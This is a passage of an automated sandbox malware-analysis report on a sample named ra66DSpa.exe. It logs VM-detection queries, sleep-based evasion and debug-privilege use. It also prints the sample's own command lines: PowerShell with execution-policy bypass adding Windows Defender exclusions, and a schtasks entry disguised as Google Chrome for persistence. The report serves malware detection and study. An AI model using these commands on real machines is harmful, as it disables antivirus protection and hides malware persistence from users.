            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\ra66DSpa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\ra66DSpa.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeMemory allocated: 1A9D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 11A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 1AC50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 1AE90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: ED0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 1AB90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 1370000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMemory allocated: 1B040000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ra66DSpa.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ra66DSpa.exeWindow / User API: threadDelayed 9617Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5590Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4278Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5599Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4148Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5851Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3923Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2605
            Source: C:\Users\user\Desktop\ra66DSpa.exe TID: 5588Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep count: 5599 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep count: 4148 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 5851 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep count: 3923 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 988Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 1132Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 6596Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\ra66DSpa.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: ra66DSpa.exe, 00000000.00000002.3383710805.000000001BA30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ra66DSpa.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeQueries volume information: C:\Users\user\Desktop\ra66DSpa.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
